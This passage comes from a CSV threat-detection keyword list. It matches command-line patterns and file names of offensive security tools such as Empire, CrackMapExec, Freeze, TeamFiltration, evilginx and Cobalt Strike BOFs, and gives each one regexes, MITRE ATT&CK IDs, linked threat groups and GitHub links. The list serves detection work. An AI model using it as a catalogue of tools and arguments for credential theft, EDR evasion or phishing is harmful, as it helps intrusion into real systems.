the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* emailall.py*",".{0,1000}\semailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "* empire.arguments*",".{0,1000}\sempire\.arguments.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - 
T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* empire.client.*",".{0,1000}\sempire\.client\..{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - 
T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* empire.py*",".{0,1000}\sempire\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* empire_exec*",".{0,1000}\sempire_exec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* empireadmin*",".{0,1000}\sempireadmin.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* enable_all_tokens.exe*",".{0,1000}\senable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* EnableAllTokenPrivs.exe*",".{0,1000}\sEnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "* EnableAllTokenPrivs.ps1*",".{0,1000}\sEnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "* -enabled -u * -p * -old-bloodhound*",".{0,1000}\s\-enabled\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-old\-bloodhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -encrypt * -process * -sandbox *",".{0,1000}\s\-encrypt\s.{0,1000}\s\-process\s.{0,1000}\s\-sandbox\s.{0,1000}","offensive_tool_keyword","Freeze","Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","0","N/A","N/A","10","1378","171","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "* encryption_aes.exe*",".{0,1000}\sencryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* encryption_rc4.exe*",".{0,1000}\sencryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and 
sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* enip-info.nse*",".{0,1000}\senip\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* enum 127.0.0.1 *",".{0,1000}\senum\s127\.0\.0\.1\s.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "* enum -passive -d *",".{0,1000}\senum\s\-passive\s\-d\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* --enum --validate-msol *",".{0,1000}\s\-\-enum\s\-\-validate\-msol\s.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* --enum --validate-teams*",".{0,1000}\s\-\-enum\s\-\-validate\-teams.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "* enum_avproducts*",".{0,1000}\senum_avproducts.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* enum_chrome*",".{0,1000}\senum_chrome.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* enum_dns*",".{0,1000}\senum_dns.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* EnumBrowsers.ps1*",".{0,1000}\sEnumBrowsers\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -Enumerate * -Module *",".{0,1000}\s\-Enumerate\s.{0,1000}\s\-Module\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* enumeration_process.exe*",".{0,1000}\senumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced 
techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* --enum-local-admins*",".{0,1000}\s\-\-enum\-local\-admins.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","1013","157","2023-12-21T08:48:34Z","2019-01-08T18:42:07Z" "* epmd-info.nse*",".{0,1000}\sepmd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* eppc-enum-processes.nse*",".{0,1000}\seppc\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* EternalHushCore *",".{0,1000}\sEternalHushCore\s.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "* etumbot.py*",".{0,1000}\setumbot\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "* EtwHash*",".{0,1000}\sEtwHash.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","0","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "* etwunhook.cpp*",".{0,1000}\setwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "* etwunhook.exe*",".{0,1000}\setwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. 
Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "* -eval *caplets.update* ui.update*",".{0,1000}\s\-eval\s.{0,1000}caplets\.update.{0,1000}\sui\.update.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "* EventViewer-UACBypass*",".{0,1000}\sEventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "* evil.corp *",".{0,1000}\sevil\.corp\s.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* EvilClippyManager*",".{0,1000}\sEvilClippyManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - 
T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "* evilginx*",".{0,1000}\sevilginx.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","N/A","Credential Access - Collection","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","1475","287","2024-05-01T19:00:30Z","2022-09-07T02:47:43Z" "* EvilnoVNC*",".{0,1000}\sEvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "* evil-proxy*",".{0,1000}\sevil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "* evil-proxy.rb*",".{0,1000}\sevil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "* evilrdp.gui *",".{0,1000}\sevilrdp\.gui\s.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "* EvilTwinServer *",".{0,1000}\sEvilTwinServer\s.{0,1000}","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "* -ExchHostname * -Password *",".{0,1000}\s\-ExchHostname\s.{0,1000}\s\-Password\s.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "* --excludedcs*",".{0,1000}\s\-\-excludedcs.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* exclusion.c /Fodefender.o*",".{0,1000}\sexclusion\.c\s\/Fodefender\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "* -ExeArguments 
